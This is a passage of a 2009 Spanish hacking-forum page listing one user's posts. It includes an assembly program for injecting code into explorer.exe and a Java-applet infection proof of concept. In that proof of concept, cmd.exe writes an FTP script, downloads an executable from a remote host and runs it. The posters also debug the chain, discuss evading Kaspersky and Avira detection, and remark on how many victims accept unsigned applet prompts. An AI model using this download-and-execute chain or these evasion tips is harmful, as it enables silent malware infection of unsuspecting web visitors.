elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 ... 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 [63] 64 65 66 67 68 69 70 71 72
621  Programación / ASM / SRCs de Hacker_Zero en: 18 Abril 2009, 11:51 am
Bueno, lo primero no sé si esto debe ir aquí o en análisis y diseño de malware, sino no va a aquí que alguien lo mueva  :).

Código
  1. ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\
  2. ;\\\///\\\///\\\///\\\///\\\Inyección de Código en Memoria //\\\///\\\///\\\///\\\
  3. ;\\\///\\\///\\\///\\\///\\\          By Hacker_Zero       //\\\///\\\///\\\///\\\
  4. ;\\\///\\\///\\\///\\\///\\\      http://www.eduhack.es    //\\\///\\\///\\\///\\\
  5. ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\
  6.  
  7. Format PE GUI 4.0
  8. entry start
  9. include 'win32a.inc'
  10.  
  11. Proceso                 db 'explorer.exe',0
  12. nUser32                 db 'USER32.DLL',0
  13. nMessageBox             db 'MessageBoxA',0
  14. hProceso                dd ?
  15. DirFuncion              dd ?
  16. TamañoDatos             dd ?
  17. pInfo                   PROCESS_INFORMATION
  18. sInfo                   STARTUPINFO
  19.  
  20. start:
  21. ;Cargamos la USER32.DLL
  22. invoke LoadLibrary,nUser32
  23.  
  24. ;Obtenemos la dirección de MessageBoxA
  25. invoke GetProcAddress,eax,nMessageBox
  26. mov [mMessageBoxA],eax
  27.  
  28. ;Obtenemos la dirección de ExitProcess
  29. push    [ExitProcess]
  30. pop     [mExitProcess]
  31.  
  32. ;Creamos el Proceso
  33. invoke CreateProcessA,0,Proceso,0,0,0,CREATE_SUSPENDED,0,0,sInfo,pInfo
  34.  
  35. ;Guardamos el Handle
  36. push [pInfo.hProcess]
  37. pop [hProceso]
  38.  
  39. ;Obtenemos el tamaño e la función a inyectar
  40. mov ebx,FIN
  41. sub ebx,FuncionInyectada
  42. mov [TamañoDatos],ebx
  43.  
  44. ;Reservamos espacio en memoria para la función a inyectar
  45. invoke VirtualAllocEx,[hProceso],0,[TamañoDatos],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
  46. mov [DirFuncion],eax
  47.  
  48. ;Escribimos en memoria los datos
  49. invoke WriteProcessMemory,[hProceso],[DirFuncion],FuncionInyectada,[TamañoDatos],0
  50.  
  51. ;Creamos el hilo en el proceso
  52. invoke CreateRemoteThread,[hProceso],0,0,[DirFuncion],0,0,0
  53.  
  54. ;Salimos
  55. invoke ExitProcess,0
  56.  
  57. ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///
  58. ;\\\///\\\///\\\///\\\///\  Función Que se Inyecta  ///\\\///\\\///\\\///
  59. ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///
  60. proc FuncionInyectada
  61. ;Obtenemos la dirección de memoria donde nos estamos ejecutando
  62. pushad
  63. call delta
  64. delta:
  65. pop ebp
  66. sub ebp,delta
  67. push ebp ebp
  68. pop ebx ecx
  69.  
  70. ;Obtenemos la dirección donde se cargó el Mensaje y el Título
  71. add ebx,Mensaje
  72. add ecx,Titulo
  73.  
  74. ;Llamamos a MessageboxA
  75. push 0
  76. push ebx
  77. push ecx
  78. push 0
  79. call [ebp+mMessageBoxA]
  80.  
  81. ;Llamamos a ExitProcess
  82. push 0
  83. call [ebp+mExitProcess]
  84.  
  85. Titulo           db 'Code Inyectado!',0
  86. Mensaje          db 'xD',0
  87.  
  88. ;Las direcciones en memoria de las apis
  89. mMessageBoxA     dd ?
  90. mExitProcess     dd ?
  91. endp
  92. FIN:
  93. ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///
  94. ;\\\///\\\///\\\///\\\/// Fin Función Que se Inyecta //\\\///\\\///\\\///
  95. ;\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\///
  96.  
  97. data import
  98.     library KERNEL32,'KERNEL32.DLL'
  99.     import  KERNEL32,\
  100.             CreateProcessA,'CreateProcessA',\
  101.             CreateRemoteThread,'CreateRemoteThread',\
  102.             WriteProcessMemory,'WriteProcessMemory',\
  103.             VirtualAllocEx,'VirtualAllocEx',\
  104.             ExitProcess,'ExitProcess',\
  105.             LoadLibrary,'LoadLibraryA',\
  106.             GetProcAddress,'GetProcAddress'
  107. end data    

Está comentado e intenté escribirlo de forma clara para que sea fácil de comprender.

Saludos
622  Seguridad Informática / Abril negro / Re: [Abril Negro 2009] Concurso de desarrollo de malware en: 16 Abril 2009, 19:07 pm
No nos dará tiempo a tener el Virus Metamorph para esa fecha y presentarlo  :(. Para otro será  :P.

Saludos
623  Seguridad Informática / Abril negro / Re: [RET Exe Corruption] Corrompe cualquier Ejecutable en: 8 Abril 2009, 13:13 pm
En realidad no lo corrompe, cambias el código pero el programa funciona, sólo que retorna al ser arrancado  :xD.

Saludos
624  Programación / Programación Visual Basic / Re: Ayuda con Source de un Cripter RUNTIME en: 22 Febrero 2009, 11:53 am
Avira detecta todo EOF data como malware. Tienes que alargar la última sección o crear una nueva y meterlo ahí. Si te suena a chino lo que hablo busca información sobre el formato PE  :P.

Saludos
625  Programación / Programación Visual Basic / Re: Cerrar todas las Ventanas (C/S Taskkill) en: 8 Enero 2009, 16:02 pm
Jaja, bueno es raro que alguien cambie el nombre de la kernel32  :o :rolleyes:

Las apis son más rápidas, con manejo de errores y dan más posibilidades  ;).

Saludos
626  Seguridad Informática / Hacking / Re: [POC] Infección Mediante Java Applet (y VBScript) en: 3 Enero 2009, 01:22 am
Pero ves la ventana del ftp? Yo me sale la pantalla de msdos en un pantallazo rapido y se cierra, casi no se nota, luego de poco tiempo, no 3 segundos se me descarga el exe y se ejecuta, te da error al abrir el applet de que el arhivo poc.exe no es una aplicacion win32 valida o no llega ahí? Si hay fallo en el ftp debería mostrar ese error, pero no tiene xk haber fallo, yo lo testeo 20 veces y no falla, haber si alguien mas puede probar  :-\, ahora que pensaba que me saltaba el kav va y ni arranca  :xD.

Saludos
627  Seguridad Informática / Hacking / Re: [POC] Infección Mediante Java Applet (y VBScript) en: 3 Enero 2009, 00:59 am
Ais no puede ser!!!, lo de 0 bytes estaba solucionado, tiene que ir, vamos a mi me funciona  :rolleyes:. Prueba otra vez haber, dime que windows, vista?

Saludos
628  Seguridad Informática / Hacking / Re: [POC] Infección Mediante Java Applet y VBScript en: 2 Enero 2009, 20:34 pm
Tamos preparando el poc nuevamente sin utilizar vbs, ahora mismo lo subimos para que lo prueben con el kis, haber si lo detecta por proactiva o no, funciona descargando el archivo por ftp desde la shell  ;D.

Saludos
629  Seguridad Informática / Hacking / Re: [POC] Infección Mediante Java Applet y VBScript en: 2 Enero 2009, 04:03 am
Estoy trantando de hacerlo todo desde la shell para prescindir del vbs y que no lo detecte el kis, haber si me podéis ayudar, tengo lo siguiente:

Código:
@echo off
echo usuario@nombreftp.com>C:\datos.txt
echo contraseña>>C:\datos.txt
echo cd /path>>C:\datos.txt
echo pwd>>C:\datos.txt
echo binary>>C:\datos.txt
echo get archivo.exe>>C:\datos.txt
echo bye>>C:\datos.txt 
echo quit>>C:\datos.txt
ftp -s:C:\datos.txt nombreftp.com
start archivo.exe

(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)

El caso es que ése código funciona perfectamente, me descarga el archivo del ftp y me lo ejecuta, pero cuando trato de pasarlo a php para que lo ejecute el applet con cmd.exe /c de esta forma:

Código
  1. echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
  2. echo "<param name='first' value='
  3. cmd.exe /c 
  4. echo usuario@nombreftp.com>C:\datos.txt &
  5. echo contraseña>>C:\datos.txt &
  6. echo cd /path>>C:\datos.txt &
  7. echo pwd>>C:\datos.txt &
  8. echo binary>>C:\datos.txt &
  9. echo get archivo.exe>>C:\datos.txt &
  10. echo bye>>C:\datos.txt &
  11. echo quit>>C:\datos.txt &
  12. ftp -s:C:\datos.txt nombreftp.com &
  13. start archivo.exe
  14. '>";
  15. echo "</applet>";

Al abrir la pagina, el applet se ejecuta, ejecuta los comandos pero me genera un archivo.exe de 0 bytes y obvio da error al ejecutarlo, alguien sabe a que se debe o como lo podría solucionar?

Saludos

PD: Si cae mucha gente, si no fuera por lo del kis sería perfecto, ya que en todos los applets no firmados sale ese mensaje, la gente está acostumbrada a aceptarlo, inicias un chat y sale el mensaje, te vas a jugar al ajedrez y sale ese mensaje, etc...

Edito, el fallo era un espacio, hay que hacer:
Código:
cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt&echo contraseña>>C:\datos.txt &
NO:
Código:
cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt & echo contraseña>>C:\datos.txt &

Un erro tonto que nos costo a mi y a wofo un gran dolor de cabeza, jajaja.

Saludos
630  Seguridad Informática / Hacking / Re: [POC] Infección Mediante Java Applet y VBScript en: 2 Enero 2009, 01:57 am
Hm pero ahora que lo pienso, si lo que detecta la heurística es la creación del vbs, mediante /c se pueden descargar los archivos de un ftp con acceso anónimo sin necesidad de crear ningún script, aunque no estoy seguro, me creo un ftp y les cuento, jaja.

Saludos
Páginas: 1 ... 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 [63] 64 65 66 67 68 69 70 71 72
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines